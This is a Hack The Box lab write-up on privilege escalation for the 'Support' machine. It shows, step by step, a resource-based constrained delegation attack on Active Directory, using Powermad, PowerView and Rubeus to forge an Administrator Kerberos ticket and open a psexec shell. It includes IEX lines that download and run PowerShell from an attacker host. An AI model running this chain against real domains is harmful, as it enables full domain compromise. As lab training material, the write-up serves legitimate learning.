> For the complete documentation index, see [llms.txt](https://htb.adot8.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://htb.adot8.com/hack-the-box/oscp-like-boxes/windows/support/priv-esc.md).

# Priv Esc

#### Outbound object rights

<figure><img src="/files/sBCgZLMkquFH5PqOZw95" alt=""><figcaption></figcaption></figure>

#### Generic all

<figure><img src="/files/uT8mr8qS83kSncunme31" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/nSulBjyzRHwVec9qqna7" alt=""><figcaption></figcaption></figure>

* We are going to create a new machine account
* When you create accounts in AD you can specify the password
* Now that we know the password the machine account, we can use it so sign tickets
* We can then grab the SID
* We then add the ability for to act on the behalf of other identities to the new computer
* This will allow the computer to sign Kerberos rickets for other users other than itself (S4U)
* Now we can forge a ticket from the **Administrator** that comes this machine and machines in the domain will trust it&#x20;
* Use the ticket to get a pop a shell

{% embed url="<https://github.com/Kevin-Robertson/Powermad.git>" %}

{% embed url="<https://github.com/PowerShellMafia/PowerSploit/tree/dev>" %}

{% embed url="<https://github.com/Flangvik/SharpCollection/blob/master/NetFramework_4.7_x64/Rubeus.exe>" %}

```
*Evil-WinRM* PS C:\Users\support\Documents> cd C:\programdata
*Evil-WinRM* PS C:\programdata> curl 10.10.14.3/Rubeus.exe -o Rubeus.exe
*Evil-WinRM* PS C:\programdata> IEX(New-Object Net.WebClient).downloadString('http://10.10.14.3/Powermad.ps1')
*Evil-WinRM* PS C:\programdata> IEX(New-Object Net.WebClient).downloadString('http://10.10.14.3/PowerView.ps1')
```

Test permissions

```
Get-DomainObject -Identity 'DC=SUPPORT,DC=HTB' | select ms-ds-machineaccountquota
```

<figure><img src="/files/TGAVGZ94A0PHWVFEC2IA" alt=""><figcaption></figcaption></figure>

{% hint style="info" %}
10 machines can be created
{% endhint %}

```
 New-MachineAccount -MachineAccount Adot8Machine -Password $(ConvertTo-SecureString 'adot8' -AsPlainText -Force)
```

<figure><img src="/files/zf4RWFAhllYRu2GKa7l7" alt=""><figcaption></figcaption></figure>

```
$ComputerSid = Get-DomainComputer Adot8Machine -Properties objectsid | Select -Expand objectsid
```

<figure><img src="/files/3hq13BE1rNz0OtrX66xB" alt=""><figcaption></figcaption></figure>

```
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
```

```
Get-DomainComputer Adot8Machine | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
```

```
.\Rubeus.exe hash /password:adot8
```

<figure><img src="/files/Ysdb4DSdUwCTmrdY0ZcD" alt=""><figcaption></figcaption></figure>

```
.\Rubeus.exe s4u /user:Adot8Machine$ /rc4:872E7BD85E304E2AF28DFE1BDAF25D8B /impersonateuser:Administrator /msdsspn:cifs/dc.support.htb /ptt
```

<figure><img src="/files/iNfmvtYNoTlRC3vaWhIt" alt=""><figcaption></figcaption></figure>

{% hint style="info" %}
Paste contents into ticket.kirbi.b64 and remove spaces
{% endhint %}

```
base64 -d ticket.kirbi.b64 > ticket.kirbi
```

```
ticketConverter.py ticket.kirbi ticket.ccache
```

<figure><img src="/files/GfonTRjcp8uKcb3DzaeH" alt=""><figcaption></figcaption></figure>

```
export KRB5CCNAME=ticket.ccache
```

```
impacket-psexec -k -no-pass support.htb/administrator@DC.SUPPORT.HTB
```

<figure><img src="/files/9MLQPZNfzN9XiJZ8b9kY" alt=""><figcaption></figcaption></figure>
